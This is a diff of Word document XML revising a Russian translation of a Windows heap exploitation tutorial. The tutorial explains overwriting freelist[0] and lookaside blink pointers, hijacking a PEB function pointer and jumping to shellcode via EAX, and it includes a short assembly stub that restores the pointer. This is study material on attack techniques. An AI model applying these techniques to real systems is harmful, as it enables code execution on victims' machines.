+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -3787,15 +4499,12 @@
       <w:rPr>
         <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
         <w:kern w:val="2"/>
-        <w:sz w:val="24"/>
         <w:szCs w:val="24"/>
         <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
       </w:rPr>
     </w:rPrDefault>
     <w:pPrDefault>
-      <w:pPr>
-        <w:widowControl/>
-      </w:pPr>
+      <w:pPr/>
     </w:pPrDefault>
   </w:docDefaults>
   <w:style w:type="paragraph" w:styleId="Normal">
@@ -3804,6 +4513,8 @@
     <w:pPr>
       <w:widowControl/>
       <w:bidi w:val="0"/>
+      <w:spacing w:before="0" w:after="0"/>
+      <w:jc w:val="left"/>
     </w:pPr>
     <w:rPr>
       <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
@@ -3827,6 +4538,13 @@
     <w:qFormat/>
     <w:rPr>
       <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Source Han Sans CN" w:cs="Liberation Mono"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Bullets">
+    <w:name w:val="Bullets"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:eastAsia="OpenSymbol" w:cs="OpenSymbol"/>
     </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading">

--- a/103.docx
+++ b/103.docx
@@ -344,15 +344,56 @@
         <w:pStyle w:val="Normal"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Идея этой атаки заключается в перезаписи указателя blink в чанке freelist[0] </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">и последующей </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">вставке </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">другого </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">чанка перед перезаписанным. blink не проверяется перед обновлением указателей flink/blink. Проверка </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">указателей </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">списка </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>(safe unlinking)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve"> происходит только в </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>[Идея этой атаки заключается в перезаписи указателя blink в чанке freelist[0]. При вставке чанка перед перезаписанным blink не проверяется перед обновлением указателей flink/blink. Проверка на разрыв связи списка происходит только в манипулируемых чанках и его соседях, но не в тех, связи которых изменяются.]</w:t>
+        <w:t>манипулируемых чанках и его соседях, но не в тех, связи которых изменяются.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1443,15 +1484,7 @@
       </w:r>
       <w:r>
         <w:rPr/>
-        <w:t>использова</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">ть </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>позже с какой-либо программой.</w:t>
+        <w:t>использовать позже с какой-либо программой.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1994,8 +2027,41 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="8">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="17">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -2050,17 +2116,6 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
         <w:t>Легко заметить, что flink/blink перезаписаны нашими данными. Теперь мы хотим перезаписать blink, хранящийся в элементе lookaside[3]. На данном этапе массив lookaside пока пуст, но мы подделаем несколько элементов. Заменим указатель:</w:t>
       </w:r>
     </w:p>
@@ -2084,8 +2139,19 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="9">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="8">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -2164,7 +2230,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="10">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="9">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:posOffset>0</wp:posOffset>
@@ -2235,7 +2301,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="19">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="16">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:posOffset>0</wp:posOffset>
@@ -2314,7 +2380,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="11">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="18">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -2393,7 +2459,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="12">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="10">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -2463,23 +2529,7 @@
       </w:r>
       <w:r>
         <w:rPr/>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>что</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> указатели в PEB рандомизированы, но так как я всего лишь демонстрирую метод, мне нужен просто </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">доступный для записи </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">указатель. Чтобы получить его значение, воспользуемся командой '!heaper dp -m'. Она покажет нам содержимое управляющей стуктуры PEB. </w:t>
+        <w:t xml:space="preserve">, что указатели в PEB рандомизированы, но так как я всего лишь демонстрирую метод, мне нужен просто доступный для записи указатель. Чтобы получить его значение, воспользуемся командой '!heaper dp -m'. Она покажет нам содержимое управляющей стуктуры PEB. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2518,7 +2568,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="13">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="11">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -2597,7 +2647,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="14">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="12">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -2722,44 +2772,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:bidi w:val="0"/>
-        <w:ind w:left="720" w:hanging="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>С этого момента, запустить шеллкод проще простого [......] и потребуется выполнение кода по указателю в EAX. К тому же первый этап шеллкода должен будет пропатчить указатель, который мы перезаписали. Ниже заготовка, как это можно сделать.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:bidi w:val="0"/>
-        <w:ind w:left="720" w:hanging="0"/>
+        <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
       </w:pPr>
@@ -2777,18 +2790,18 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="15">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="19">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>0</wp:posOffset>
+              <wp:align>center</wp:align>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
               <wp:posOffset>635</wp:posOffset>
             </wp:positionV>
             <wp:extent cx="6332220" cy="4338320"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="15" name="Image15" descr=""/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="15" name="Image17" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2796,7 +2809,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="15" name="Image15" descr=""/>
+                    <pic:cNvPr id="15" name="Image17" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -2832,6 +2845,268 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
+        <w:t xml:space="preserve">С этого момента, запустить шеллкод проще простого. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>П</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>отребуется выполнен</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>ить</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve"> код по указателю в EAX. К тому же </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>первый этап шеллкода/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">первый компонент (аналогия </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">c grub </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>stage 1?)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>[stage 1 shellcode]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve"> должен будет пропатчить указатель, который мы перезаписали. Ниже заготовка, как это можно сделать.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:bidi w:val="0"/>
+        <w:ind w:hanging="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>.386</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>.model flat, stdcall</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>option casemap:none</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>.code</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>start:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>mov eax, 7c901deh ; ntdll.RtlEnterCriticalSection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>mov ecx, 7ffdf01ch ; offset in the PEB 0x1f (yours will be different)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>add ecx, 4h</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>mov dword ptr ds:[ecx],eax</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>end start</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:t>В конечном итоге она будет транслирована в что-то типо этого:</w:t>
       </w:r>
     </w:p>
@@ -2884,120 +3159,68 @@
         <w:rPr/>
         <w:t>option casemap:none</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:val="clear" w:fill="EEEEEE"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:val="clear" w:fill="EEEEEE"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>.code</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:val="clear" w:fill="EEEEEE"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>start:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:val="clear" w:fill="EEEEEE"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>mov eax, 7c901deh ; ntdll.RtlEnterCriticalSection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:val="clear" w:fill="EEEEEE"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>mov ecx, 7ffdf01ch ; offset in the PEB 0x1f (yours will be different)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:val="clear" w:fill="EEEEEE"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>add ecx, 4h</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:val="clear" w:fill="EEEEEE"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>mov dword ptr ds:[ecx],eax</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:val="clear" w:fill="EEEEEE"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:val="clear" w:fill="EEEEEE"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>end start</w:t>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
+        </w:rPr>
+        <w:t>00401000 &gt; $ B8 DE55F777    MOV EAX,ntdll.RtlEnterCriticalSection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
+        </w:rPr>
+        <w:t>00401005   . B9 1CF0FD7F    MOV ECX,7FFDF01C</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
+        </w:rPr>
+        <w:t>0040100A   . 83C1 04        ADD ECX,4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
+        </w:rPr>
+        <w:t>0040100D   . 8901           MOV DWORD PTR DS:[ECX],EAX</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3036,207 +3259,123 @@
       </w:r>
       <w:r>
         <w:rPr/>
-        <w:t xml:space="preserve"> динамически, если адрес PEB был подобран перебором. Я оставлю сообразительному читателю расширение </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">этой </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>ассемблерной заготовки до работы с динамическим PEB и правкой смещения 0x20. Вы может использовать fs:[0x30].</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:t xml:space="preserve"> динамически, если адрес PEB был подобран перебором. Я оставлю сообразительному читателю расширение этой ассемблерной заготовки до работы с динамическим PEB и правкой смещения 0x20. Вы может использовать fs:[0x30].</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Если мы в следующий раз захотим эксплуатировать приложение одной командой, она будет выглядеть так (предполагается, что мы передаём данные по сокету):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
